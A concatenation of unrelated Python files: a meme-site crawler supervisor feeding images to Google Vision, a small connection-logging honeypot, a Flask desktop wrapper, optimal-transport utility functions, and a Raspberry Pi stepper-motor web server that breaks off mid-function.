os.mkdir("{}/data/four_chan/{}".format(DATA_ROOT_PATH, b))
def get_text_regions(filename):
annotations = annotate_text(google_client, filename)
text_regions = []
for a in annotations:
t = {'description': a.description, 'locale': a.locale}
poly = []
for v in a.bounding_poly.vertices:
poly.append({"x": v.x, "y": v.y})
t['bounding_poly'] = poly
text_regions.append(t)
return text_regions
def get_web_detection(filename):
annotations = annotate_web(google_client, filename)
full_matching_images = []
pages_with_matching_images = []
if annotations.full_matching_images:
for a in annotations.full_matching_images:
full_matching_images.append({"url": a.url, "score": a.score})
if annotations.pages_with_matching_images:
for a in annotations.pages_with_matching_images:
pages_with_matching_images.append(
{"url": a.url, "page_tile": a.page_title})
return full_matching_images, pages_with_matching_images
def _vision_thread():
while True:
img = google_queue.get()
if img is None:
break
img_obj = images.find_one({"_id": img["_id"]})
file_name = os.path.join(DATA_ROOT_PATH, img_obj['file_name'])
try:
file_stat = os.stat(file_name)
if file_stat.st_size > 10485759:
continue
if img_obj[
'created_at'] < BEGIN_CRAWL_SINCE: # (int(time.time()) - timedelta(days=CRAWL_DAYS_BACK).total_seconds()):
continue
if 'text_regions' in img_obj:
print("Skipping {}".format(file_name))
continue
if os.path.exists(file_name):
print("Text for {}".format(file_name))
print('-' * 64)
try:
img_obj['text_regions'] = get_text_regions(file_name)
img_obj['full_matching_images'], img_obj['pages_with_matching_images'] = get_web_detection(
file_name)
if len(img_obj['text_regions']):
img_obj["text"] = img_obj['text_regions'][0]['description']
img_obj['google_query_completed'] = True
except Exception as ex:
print(ex)
print('[ERROR]: {}'.format(file_name))
else:
print("{} not found".format(file_name))
images.update_one({'_id': img_obj['_id']}, {"$set": img_obj}, upsert=False)
print('-' * 82)
except Exception as ex:
print(ex)
print("[{}] failed ...///{}".format(img_obj['source'], file_name))
def signal_handler(signum, frame):
if signum in [signal.SIGINT]:
sources.update_many({"is_verified": True}, {"$set": {"is_running": False}}, upsert=False)
print("[supervisor.py] Stop signal received, waiting for children to terminate")
exit(0)
tumblr_blogs = [
u'paxamericana.tumblr.com', u'cartoon-dog.tumblr.com',
u'dragondicks.tumblr.com', u'terriamon.tumblr.com',
u'thisiselliz.tumblr.com', u'wonder-mechanic.tumblr.com',
'buzzfeed.tumblr.com', u'memearchives.tumblr.com', 'tomche.tumblr.com',
'h-i-l-a-r-i-o-u-s.tumblr.com', 'funnygamememes.tumblr.com', 'omg-humor.com', 'srsfunny.net',
'memes.tumblr.com', 'killowave-the-2nd.tumblr.com', 'memes--memes.tumblr.com', 'hedankest.tumblr.com',
'the-memedaddy.tumblr.com', 'dankmemesreasonforliving.tumblr.com', 'lolwtfmemes.tumblr.com',
'knowwhatime.me', 'thatgirlwiththememes.tumblr.com', 'kpop-memess.tumblr.com', 'fakehistory.tumblr.com',
'funny.directory', 'edgy-memes-for-woke-teens.tumblr.com', 'universeofmemes.tumblr.com',
'unpredictablememes.tumblr.com', '30-minute-memes.tumblr.com', 'memecollege.tumblr.com',
'tumblr.tastefullyoffensive.com', 'meme-fire.tumblr.com', 'im-sad-and-i-like-memes.tumblr.com',
'forthefuns.tumblr.com', 'thesoberbitch.tumblr.com', 'memeosas.tumblr.com', 'memes-r-memes.tumblr.com',
'spicymemesociety.tumblr.com', 'catchymemes.com', 'memeuplift.tumblr.com', 'the-suburban-craft.tumblr.com',
'annoyingmemes.tumblr.com', 'omghotmemes.tumblr.com', 'forever-memes.tumblr.com', 'thatfunnymeme.tumblr.com',
'memelord18.tumblr.com', 'xno-chill-memesx.tumblr.com', 'lobotomizedbrain.tumblr.com', 'meme-gutter.tumblr.com',
'sassysaidie.tumblr.com', 'browsedankmemes.com'
]
if __name__ == '__main__':
signal.signal(signal.SIGCHLD, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
srs = [sub_reddit.replace('r/', '') for sub_reddit in sub_reddit_accounts]
nine_proc = NineGagCrawler(google_queue=google_queue)
fj_proc = FunnyJunkCrawler(google_queue=google_queue)
on_sizzle_proc = OnSizzleCrawler(google_queue=google_queue)
imgflip_proc = ImgFlipCrawler(google_queue=google_queue)
imgur_proc = ImgurCrawler(google_queue=google_queue)
meme_xyz_proc = MemeXYZCrawler(google_queue=google_queue)
meme_proc = MeMeCrawler(google_queue=google_queue)
memedroid_proc = MemedroidCrawler(google_queue=google_queue)
vifunow_proc = VifunowCrawler(google_queue=google_queue)
quora_treasury_proc = QuoraTreasuryCrawler(google_queue=google_queue)
cheez_burger_proc = CheezBurgerCrawler(google_queue=google_queue)
the_chive_proc = TheChiveCrawler(google_queue=google_queue)
ruin_my_week_proc = RuinMyWeekCrawler(google_queue=google_queue)
dump_a_day_proc = DumpADayCrawler(google_queue=google_queue)
troll_street_proc = TrollStreetCrawler(google_queue=google_queue)
the_humor_train_proc = TheHumorTrainCrawler(google_queue=google_queue)
ifunny_proc = IfunnyCrawler(google_queue=google_queue)
ladnow_proc = LadnowCrawler(google_queue=google_queue)
meme_generator_proc = MemeGeneratorCrawler(google_queue=google_queue)
buzzfeed_proc = BuzzFeedCrawler(google_queue=google_queue)
meme_guy_proc = MemeGuyCrawler(google_queue=google_queue)
dopl3r_proc = Dopl3rCrawler(google_queue=google_queue)
the_funny_beaver_proc = TheFunnyBeaverCrawler(google_queue=google_queue)
funny_memes_proc = FunnyMemesCrawler(google_queue=google_queue)
le_funny_proc = LeFunnyCrawler(google_queue=google_queue)
dank_meme_team = DankMemeTeamCrawler(google_queue=google_queue)
funny_photo = FunnyPhotoCrawler(google_queue=google_queue)
img_lulz = ImgLulzCrawler(google_queue=google_queue)
huge_lol = HugeLolCrawler(google_queue=google_queue)
daily_pic_dump = DailyPicDumpCrawler(google_queue=google_queue)
call_center_memes = CallCenterMemesCrawler(google_queue=google_queue)
pr0gramm_crawler = Pr0grammCrawler(google_queue=google_queue)
trend_uso_crawler = TrendUSOMemesCrawler(google_queue=google_queue)
best_funny_pic_crawler = BestFunnyPicCrawler(google_queue=google_queue)
joy_reactor_crawler = JoyReactorCrawler(google_queue=google_queue)
beer_money_pizza_crawler = BeerMoneyPizzaCrawler(google_queue=google_queue)
hidden_lol_crawler = HiddenLolCrawler(google_queue=google_queue)
fun_substance_crawler = FreshSubstanceCrawler(google_queue=google_queue)
nine_buzz_crawler = NineBuzzCrawler(google_queue=google_queue)
the_meta_picture_crawler = TheMetaPictureCrawler(google_queue=google_queue)
daily_haha_crawler = DailyHahaCrawler(google_queue=google_queue)
dev_humor_crawler = DevHumorCrawler(google_queue=google_queue)
iwsmt_crawler = IWSMTCrawler(google_queue=google_queue)
four_pm_happy_hour_crawler = FourPMHappyHourCrawler(google_queue=google_queue)
kontraband_crawler = KontrabandCrawler(google_queue=google_queue)
still_cracking_crawler = StillCrackingCrawler(google_queue=google_queue)
meme_collection_crawler = MemeCollectionCrawler(google_queue=google_queue)
slow_robot_crawler = SlowRobotCrawler(google_queue=google_queue)
wanna_joke_crawler = WannaJokeCrawler(google_queue=google_queue)
some_ecards_crawler = SomeEcardsCrawler(google_queue=google_queue)
laugh_tard_crawler = LaughTardCrawler(google_queue=google_queue)
humour_spot_crawler = HumourSpotCrawler(google_queue=google_queue)
put_me_like_crawler = PutMeLikeCrawler(google_queue=google_queue)
spastic_bastard_crawler = SpasticBastardCrawler(google_queue=google_queue)
saying_images_crawler = SayingImagesCrawler(google_queue=google_queue)
fun_pic_crawler = FunPicCrawler(google_queue=google_queue)
barnorama_crawler = BarnoramaCrawler(google_queue=google_queue)
fun_mary_crawler = FunMaryCrawler(google_queue=google_queue)
gorilla_feed_crawler = GorillaFeedCrawler(google_queue=google_queue)
one_jux_crawler = OneJuxCrawler(google_queue=google_queue)
odd_stuff_magazine_crawler = OddStuffMagazineCrawler(google_queue=google_queue)
love_for_quotes_crawler = LoveForQuotesCrawler(google_queue=google_queue)
bored_panda_crawler = BoredPandaCrawler(google_queue=google_queue)
ebaums_world_crawler = EbaumsWorldCrawler(google_queue=google_queue)
thunder_dungeon_crawler = ThunderDungeonCrawler(google_queue=google_queue)
zodab_crawler = ZodabCrawler(google_queue=google_queue)
funny_captions_crawler = FunnyCaptionsCrawler(google_queue=google_queue)
fame_pace_crawler = FamePaceCrawler(google_queue=google_queue)
funny_memes_4u_crawler = FunnyMemes4UCrawler(google_queue=google_queue)
epic_pix_crawler = EpicPixCrawler(google_queue=google_queue)
lol_damn_crawler = LolDamnCrawler(google_queue=google_queue)
uber_humor_crawler = UberHumorCrawler(google_queue=google_queue)
just_viral_crawler = JustViralCrawler(google_queue=google_queue)
acid_cow_crawler = AcidCowCrawler(google_queue=google_queue)
clean_memes_crawler = CleanMemesCrawler(google_queue=google_queue)
the_last_thing_crawler = TheLastThingCrawler(google_queue=google_queue)
astrology_memes_crawler = AstrologyMemesCrawler(google_queue=google_queue)
thug_life_meme_crawler = ThugLifeMemeCrawler(google_queue=google_queue)
# evil_milk_crawler = EvilMilkCrawler(google_queue=google_queue) --not meme
reddit_thread = RedditCrawler(sub_reddits=srs, google_queue=google_queue)
ig_thread = InstagramCrawler(handles=ig_accounts, google_queue=google_queue)
tumblr_thread = TumblrCrawler(blogs=tumblr_blogs, google_queue=google_queue)
four_chan_thread = FourChanCrawler(boards=four_chan_boards, google_queue=google_queue)
facebook_thread = FacebookCrawler(pages=facebook_pages_list, google_queue=google_queue)
twitter_thread = TwitterCrawler(handles=twitter_accounts_list, google_queue=google_queue)
izismile_crawler = IzismileCrawler(google_queue=google_queue)
quotes_n_humor_crawler = QuotesNHumorCrawler(google_queue=google_queue)
screen_eggs_crawler = ScreenEggsCrawler(google_queue=google_queue)
collect_new_data = True
for x in range(0, 8):
google_vision_thread = threading.Thread(target=_vision_thread)
google_vision_thread.start()
if collect_new_data:
fj_proc.start()
nine_proc.start()
on_sizzle_proc.start()
imgflip_proc.start()
imgur_proc.start()
meme_xyz_proc.start()
memedroid_proc.start()
vifunow_proc.start()
# quora_treasury_proc.start() #offline
cheez_burger_proc.start()
the_chive_proc.start()
ruin_my_week_proc.start()
dump_a_day_proc.start()
troll_street_proc.start()
the_humor_train_proc.start()
ifunny_proc.start()
meme_generator_proc.start()
buzzfeed_proc.start()
meme_guy_proc.start()
dopl3r_proc.start()
the_funny_beaver_proc.start()
# funny_memes_proc.start()
le_funny_proc.start()
dank_meme_team.start()
funny_photo.start()
img_lulz.start()
huge_lol.start()
daily_pic_dump.start()
call_center_memes.start()
pr0gramm_crawler.start()
trend_uso_crawler.start()
best_funny_pic_crawler.start()
joy_reactor_crawler.start()
beer_money_pizza_crawler.start()
hidden_lol_crawler.start()
fun_substance_crawler.start()
nine_buzz_crawler.start()
the_meta_picture_crawler.start()
daily_haha_crawler.start()
dev_humor_crawler.start()
iwsmt_crawler.start()
four_pm_happy_hour_crawler.start()
kontraband_crawler.start()
still_cracking_crawler.start()
meme_collection_crawler.start()
slow_robot_crawler.start()
wanna_joke_crawler.start()
some_ecards_crawler.start()
laugh_tard_crawler.start()
humour_spot_crawler.start()
put_me_like_crawler.start()
spastic_bastard_crawler.start()
saying_images_crawler.start()
fun_pic_crawler.start()
barnorama_crawler.start()
fun_mary_crawler.start()
gorilla_feed_crawler.start()
one_jux_crawler.start()
odd_stuff_magazine_crawler.start()
love_for_quotes_crawler.start()
bored_panda_crawler.start()
ebaums_world_crawler.start()
thunder_dungeon_crawler.start()
zodab_crawler.start()
funny_captions_crawler.start()
fame_pace_crawler.start()
# funny_memes_4u_crawler.start()
epic_pix_crawler.start()
lol_damn_crawler.start()
uber_humor_crawler.start()
just_viral_crawler.start()
acid_cow_crawler.start()
# evil_milk_crawler.start()
clean_memes_crawler.start()
the_last_thing_crawler.start()
astrology_memes_crawler.start()
thug_life_meme_crawler.start()
facebook_thread.start()
four_chan_thread.start()
reddit_thread.start()
ig_thread.start()
tumblr_thread.start()
twitter_thread.start()
izismile_crawler.start()
quotes_n_humor_crawler.start()
screen_eggs_crawler.start()
print("Sig Pause..")
signal.pause()
|
honeytrigger.py
|
import socket
import multiprocessing
import datetime
import atexit
import time
threads = []
def killthreads():
global threads
for t in threads:
t.terminate()
def log(data2log):
with open("logs.txt", "a") as f:
f.write(str(datetime.datetime.now()) + " | " + str(data2log) + "\n")
def listen(ip, port, send_message, message):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((ip, port))
s.listen()
while True:
c, addr = s.accept()
log("Connection accepted from " + str(addr) + " Port:" +str(port))
if send_message == 1:
try:
c.sendall(message.encode())
log("Message sent to" + str(addr) + " Port:" +str(port))
data = c.recv(4096)
log(f"Data - {str(data)} - received from " + str(addr) + " Port:" +str(port))
except:
pass
try:
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
log("Connection closed to " + str(addr) + " Port:" +str(port))
else:
try:
data = c.recv(4096)
log(f"Data - {str(data)} - received from " + str(addr) + " Port:" +str(port))
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
log("Connection closed to " + str(addr) + " Port:" +str(port))
def main():
global threads
ip = "0.0.0.0"
send_message = 0
message = "Blocked"
port_range = "3000,3500"
port_range = port_range.split(",")
for port in range(int(port_range[0]), int(port_range[1])):
p = multiprocessing.Process(target=listen, args=(ip, port, send_message, message))
p.start()
threads.append(p)
print("Done. Waiting for bears \n{} Threads Running".format(len(threads)))
log("Done. Waiting for bears, {} Threads Running".format(len(threads)))
if __name__ == "__main__":
atexit.register(killthreads)
main()
|
__init__.py
|
import socket
from threading import Thread
from flask_desktop_ui import chromium_browser_wrapper
LOCAL_HOST = '127.0.0.1'
RANDOM_PORT = 0
class FlaskDesktopUI(object):
def __init__(self, app):
self.port = _get_random_port()
self.flask_job = Thread(target=app.run, args=(LOCAL_HOST, self.port))
self.flask_job.daemon = True
def run(self):
self.flask_job.start()
chromium_browser_wrapper.initialize()
chromium_browser_wrapper.open_url('http://{ip}:{port}'.format(ip=LOCAL_HOST, port=self.port))
chromium_browser_wrapper.message_loop()
def _get_random_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_HOST, RANDOM_PORT))
port = sock.getsockname()[1]
sock.close()
return port
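# A minimal usage sketch, assuming an existing Flask application object named
# `app` (hypothetical name; comments only, not executed on import):
#
#   from flask import Flask
#   app = Flask(__name__)
#
#   @app.route('/')
#   def index():
#       return 'hello'
#
#   FlaskDesktopUI(app).run()   # serves on 127.0.0.1:<random free port> and
#                               # opens a Chromium window pointed at it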
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Various functions that can be useful
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import multiprocessing
from functools import reduce
import time
import numpy as np
from scipy.spatial.distance import cdist
import sys
import warnings
try:
from inspect import signature
except ImportError:
from .externals.funcsigs import signature
__time_tic_toc = time.time()
def tic():
""" Python implementation of Matlab tic() function """
global __time_tic_toc
__time_tic_toc = time.time()
def toc(message='Elapsed time : {} s'):
""" Python implementation of Matlab toc() function """
t = time.time()
print(message.format(t - __time_tic_toc))
return t - __time_tic_toc
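# A minimal usage sketch for tic()/toc(), illustration only (comments):
#
#   tic()
#   do_heavy_work()                  # hypothetical placeholder
#   elapsed = toc('Done in {} s')    # prints and returns the elapsed seconds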
def toq():
""" Python implementation of Julia toc() function """
t = time.time()
return t - __time_tic_toc
def kernel(x1, x2, method='gaussian', sigma=1, **kwargs):
"""Compute kernel matrix"""
if method.lower() in ['gaussian', 'gauss', 'rbf']:
K = np.exp(-dist(x1, x2) / (2 * sigma**2))
return K
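# A minimal usage sketch, illustration only (comments; x is any (n, d) array):
#
#   x = np.random.randn(5, 2)
#   K = kernel(x, x, method='gaussian', sigma=1.)   # (5, 5) Gram matrix, ones on the diagonal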
def unif(n):
""" return a uniform histogram of length n (simplex)
Parameters
----------
n : int
number of bins in the histogram
Returns
-------
h : np.array (n,)
histogram of length n such that h_i=1/n for all i
"""
return np.ones((n,)) / n
def clean_zeros(a, b, M):
""" Remove all components with zeros weights in a and b
"""
    M2 = M[a > 0, :][:, b > 0].copy()  # copy forces a C-style matrix (for emd)
a2 = a[a > 0]
b2 = b[b > 0]
return a2, b2, M2
def euclidean_distances(X, Y, squared=False):
"""
Considering the rows of X (and Y=X) as vectors, compute the
distance matrix between each pair of vectors.
Parameters
----------
X : {array-like}, shape (n_samples_1, n_features)
Y : {array-like}, shape (n_samples_2, n_features)
squared : boolean, optional
Return squared Euclidean distances.
Returns
-------
distances : {array}, shape (n_samples_1, n_samples_2)
"""
XX = np.einsum('ij,ij->i', X, X)[:, np.newaxis]
YY = np.einsum('ij,ij->i', Y, Y)[np.newaxis, :]
distances = np.dot(X, Y.T)
distances *= -2
distances += XX
distances += YY
np.maximum(distances, 0, out=distances)
if X is Y:
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
distances.flat[::distances.shape[0] + 1] = 0.0
return distances if squared else np.sqrt(distances, out=distances)
def dist(x1, x2=None, metric='sqeuclidean'):
"""Compute distance between samples in x1 and x2 using function scipy.spatial.distance.cdist
Parameters
----------
x1 : np.array (n1,d)
matrix with n1 samples of size d
x2 : np.array (n2,d), optional
matrix with n2 samples of size d (if None then x2=x1)
metric : str, fun, optional
name of the metric to be computed (full list in the doc of scipy), If a string,
the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock',
'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
if x2 is None:
x2 = x1
if metric == "sqeuclidean":
return euclidean_distances(x1, x2, squared=True)
return cdist(x1, x2, metric=metric)
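# A minimal usage sketch, illustration only (comments):
#
#   x1 = np.random.randn(4, 3)
#   x2 = np.random.randn(6, 3)
#   M = dist(x1, x2)                          # (4, 6) squared Euclidean costs
#   M_l1 = dist(x1, x2, metric='cityblock')   # any cdist metric also works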
def dist0(n, method='lin_square'):
"""Compute standard cost matrices of size (n,n) for OT problems
Parameters
----------
n : int
size of the cost matrix
method : str, optional
Type of loss matrix chosen from:
* 'lin_square' : linear sampling between 0 and n-1, quadratic loss
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
res = 0
if method == 'lin_square':
x = np.arange(n, dtype=np.float64).reshape((n, 1))
res = dist(x, x)
return res
def cost_normalization(C, norm=None):
""" Apply normalization to the loss matrix
Parameters
----------
C : np.array (n1, n2)
The cost matrix to normalize.
norm : str
        type of normalization from 'median', 'max', 'log', 'loglog'. Any other
        value does not normalize.
Returns
-------
C : np.array (n1, n2)
The input cost matrix normalized according to given norm.
"""
if norm == "median":
C /= float(np.median(C))
elif norm == "max":
C /= float(np.max(C))
elif norm == "log":
C = np.log(1 + C)
elif norm == "loglog":
C = np.log(1 + np.log(1 + C))
return C
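# A minimal usage sketch, illustration only (comments):
#
#   M = dist(x1, x2)
#   M = cost_normalization(M, 'median')   # rescale so the median cost equals 1
#   # or cost_normalization(M, 'log') to compress the dynamic range instead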
def dots(*args):
""" dots function for multiple matrix multiply """
return reduce(np.dot, args)
def fun(f, q_in, q_out):
""" Utility function for parmap with no serializing problems """
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
""" paralell map for multiprocessing """
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
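# A minimal usage sketch, illustration only (comments); the mapped function
# should be defined at module level so it pickles on spawn-based platforms:
#
#   def square(v):
#       return v ** 2
#   parmap(square, range(8), nprocs=4)   # -> [0, 1, 4, 9, 16, 25, 36, 49]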
def check_params(**kwargs):
"""check_params: check whether some parameters are missing
"""
missing_params = []
check = True
for param in kwargs:
if kwargs[param] is None:
missing_params.append(param)
if len(missing_params) > 0:
print("POT - Warning: following necessary parameters are missing")
for p in missing_params:
print("\n", p)
check = False
return check
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
Parameters
----------
seed : None | int | instance of RandomState
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (int, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('{} cannot be used to seed a numpy.random.RandomState'
' instance'.format(seed))
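# A minimal usage sketch, illustration only (comments):
#
#   rng = check_random_state(42)     # new RandomState seeded with 42
#   rng = check_random_state(rng)    # an existing RandomState is returned unchanged
#   rng = check_random_state(None)   # the global numpy RandomState singleton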
class deprecated(object):
"""Decorator to mark a function or class as deprecated.
deprecated class from scikit-learn package
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/deprecation.py
Issue a warning when the function is called/the class is instantiated and
adds a warning to the docstring.
The optional extra argument will be appended to the deprecation message
and the docstring. Note: to use this with the default value for extra, put
    in an empty set of parentheses:
>>> from ot.deprecation import deprecated
>>> @deprecated()
... def some_function(): pass
Parameters
----------
extra : string
to be added to the deprecation messages
"""
# Adapted from http://wiki.python.org/moin/PythonDecoratorLibrary,
# but with many changes.
def __init__(self, extra=''):
self.extra = extra
def __call__(self, obj):
"""Call method
Parameters
----------
obj : object
"""
if isinstance(obj, type):
return self._decorate_class(obj)
else:
return self._decorate_fun(obj)
def _decorate_class(self, cls):
msg = "Class %s is deprecated" % cls.__name__
if self.extra:
msg += "; %s" % self.extra
# FIXME: we should probably reset __new__ for full generality
init = cls.__init__
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return init(*args, **kwargs)
cls.__init__ = wrapped
wrapped.__name__ = '__init__'
wrapped.__doc__ = self._update_doc(init.__doc__)
wrapped.deprecated_original = init
return cls
def _decorate_fun(self, fun):
"""Decorate function fun"""
msg = "Function %s is deprecated" % fun.__name__
if self.extra:
msg += "; %s" % self.extra
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return fun(*args, **kwargs)
wrapped.__name__ = fun.__name__
wrapped.__dict__ = fun.__dict__
wrapped.__doc__ = self._update_doc(fun.__doc__)
return wrapped
def _update_doc(self, olddoc):
newdoc = "DEPRECATED"
if self.extra:
newdoc = "%s: %s" % (newdoc, self.extra)
if olddoc:
newdoc = "%s\n\n%s" % (newdoc, olddoc)
return newdoc
def _is_deprecated(func):
"""Helper to check if func is wraped by our deprecated decorator"""
if sys.version_info < (3, 5):
raise NotImplementedError("This is only available for python3.5 "
"or above")
closures = getattr(func, '__closure__', [])
if closures is None:
closures = []
is_deprecated = ('deprecated' in ''.join([c.cell_contents
for c in closures
if isinstance(c.cell_contents, str)]))
return is_deprecated
class BaseEstimator(object):
"""Base class for most objects in POT
adapted from sklearn BaseEstimator class
Notes
-----
All estimators should specify all the parameters that can be set
at the class level in their ``__init__`` as explicit keyword
arguments (no ``*args`` or ``**kwargs``).
"""
@classmethod
def _get_param_names(cls):
"""Get parameter names for the estimator"""
# fetch the constructor or the original constructor before
# deprecation wrapping if any
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
if init is object.__init__:
# No explicit constructor to introspect
return []
# introspect the constructor arguments to find the model parameters
# to represent
init_signature = signature(init)
# Consider the constructor parameters excluding 'self'
parameters = [p for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD]
for p in parameters:
if p.kind == p.VAR_POSITIONAL:
raise RuntimeError("POT estimators should always "
"specify their parameters in the signature"
" of their __init__ (no varargs)."
" %s with constructor %s doesn't "
" follow this convention."
% (cls, init_signature))
# Extract and sort argument names excluding 'self'
return sorted([p.name for p in parameters])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
out = dict()
for key in self._get_param_names():
# We need deprecation warnings to always be on in order to
# catch deprecated param values.
# This is set in utils/__init__.py but it gets overwritten
# when running under python3 somehow.
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
# if the parameter is deprecated, don't show it
continue
finally:
warnings.filters.pop(0)
# XXX: should we rather test if instance of estimator?
if deep and hasattr(value, 'get_params'):
deep_items = value.get_params().items()
out.update((key + '__' + k, val) for k, val in deep_items)
out[key] = value
return out
def set_params(self, **params):
"""Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Returns
-------
self
"""
if not params:
# Simple optimisation to gain speed (inspect is slow)
return self
valid_params = self.get_params(deep=True)
# for key, value in iteritems(params):
for key, value in params.items():
split = key.split('__', 1)
if len(split) > 1:
# nested objects case
name, sub_name = split
if name not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(name, self))
sub_object = valid_params[name]
sub_object.set_params(**{sub_name: value})
else:
# simple objects case
if key not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(key, self.__class__.__name__))
setattr(self, key, value)
return self
class UndefinedParameter(Exception):
"""
    Exception raised when an undefined parameter is accessed
"""
pass
|
DualStepperWeb.py
|
#!/usr/bin/python
#coding=utf-8
# Install in Linux bash
# python3 -m http.server #
# sudo pip install simple_http_server #?
# sudo pip3 install Adafruit_MotorHAT
#
# 20190530 update
#
import os
import sys
import socket
import RPi.GPIO as GPIO # Check it in your windows or Raspbian platform
#import cgi #CGIHTTPServer CGIHTTPRequestHandler for the post
from http.server import BaseHTTPRequestHandler, HTTPServer # must be run under Python 3 (http.server module)
from Adafruit_MotorHAT import Adafruit_MotorHAT
import time
import atexit
import threading
import random
# create empty threads (these will hold the stepper 1 and 2 threads)
st1 = threading.Thread()
st2 = threading.Thread()
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
myStepper1 = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
myStepper2 = mh.getStepper(200, 2) # 200 steps/rev, motor port #2
myStepper1.setSpeed(6) # RPM, DC motor from 0(off) to 255(max speed), Stepper motor(usually between 60-200)
myStepper2.setSpeed(6) # RPM, DC motor from 0(off) to 255(max speed), Stepper motor(usually between 60-200)
# direction
stepstyles = [Adafruit_MotorHAT.SINGLE, Adafruit_MotorHAT.DOUBLE, Adafruit_MotorHAT.INTERLEAVE, Adafruit_MotorHAT.MICROSTEP]
dir = Adafruit_MotorHAT.FORWARD
#dir = Adafruit_MotorHAT.BACKWARD
# recommended for auto-disabling motors on shutdown!
def turnOffMotors():
#mh.getStepper(0, 1).run(Adafruit_MotorHAT.RELEASE)
#mh.getStepper(0, 2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
atexit.register(turnOffMotors) # register now, run on Python exit (prevents the stepper motors from stalling with holding current and burning out)
def stepper_worker(stepper, numsteps, direction, style):
global stop_threads
while stop_threads:
stepper.step(numsteps, direction, style)
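# Descriptive note (comment only): the worker keeps stepping as long as the
# module-level stop_threads flag is truthy; the web handler below sets it to
# False and then join()s both threads, so each motor finishes its current
# 20-step batch before its thread exits.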
stop_threads = True
st1 = threading.Thread(target=stepper_worker, args=(myStepper1, 20, dir, stepstyles[2],))
st1.start()
st2 = threading.Thread(target=stepper_worker, args=(myStepper2, 20, dir, stepstyles[2],))
st2.start()
########################################################################################
########################################################################################
class MytestHTTPServer(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def _redirect(self, path):
self.send_response(303)
self.send_header('Content-type', 'text/html')
self.send_header('Location', path)
self.end_headers()
def do_GET(self):
html = '''
<html>
<body style="width:960px; margin: 20px auto;">
<h1>The Stepping Motor Control Information</h1>
<a href="https://louisopen.github.io">Louis Web Linking</a>
<h3>http://louisopen.github.io</h3>
<p>Raspberry pi3 Current GPU temperature is {}</p>
<p><br>GPIO testting</p>
<form action="/" method="POST">
Turn LED :
<input type="submit" name="submit" value="On">
<input type="submit" name="submit" value="Off">
</form>
<p><br>Stepping Motor Control Dash-board</p>
<form action="/" method="POST">
Stepping Motor :
<input type="submit" name="submit" value="Hi-Speed">
<input type="submit" name="submit" value="Med-Speed">
<input type="submit" name="submit" value="Lo-Speed">
<input type="submit" name="submit" value="STOP">
<input type="submit" name="submit" value="Turn-Back">
</form>
        <p><br>RS-485 UART communication; default setting is 9600,N,8,1</p>
<form action="/" method="POST">
Uart Open/Close :
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Close">
</form>
</body>
</html>
'''
temp = os.popen("/opt/vc/bin/vcgencmd measure_temp").read()
self.do_HEAD()
self.wfile.write(html.format(temp[5:]).encode("utf-8"))
def do_POST(self):
global dir,st1,st2,stop_threads
content_length = int(self.headers['Content-Length']) # Get the size of data
post_data = self.rfile.read(content_length).decode("utf-8") # Get the data
#post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
